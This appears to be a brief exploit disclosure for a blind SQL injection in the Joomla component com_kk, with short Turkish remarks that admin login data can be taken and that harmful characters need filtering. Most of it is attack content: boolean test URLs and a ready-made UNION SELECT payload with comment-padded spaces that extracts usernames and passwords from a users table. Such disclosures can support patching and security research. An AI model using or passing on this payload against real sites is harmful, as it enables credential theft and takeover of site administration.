<------------------- header data start ------------------- >
# Joomla Component com_kk Blind SQL Injection Vulnerability
# Author : Pyske | Bug Researchers
# Name : com_kk
# Bug Type : Blind SQL Injection
# Infection : Admin login bilgileri alinabilir.
# Demo Vuln. :
http://localhost/index.php?option=com_kk&kat=1 and 1=1
http://localhost/index.php?option=com_kk&kat=1 and 1=0
# Bug Fix Advice : Zararli karakterler filtrelenmelidir.
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< -- bug code start -- >
path /index.php?option=com_kk&kat=1/**/and/**/1=0/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/klhtrade_users
< -- bug code end of -- >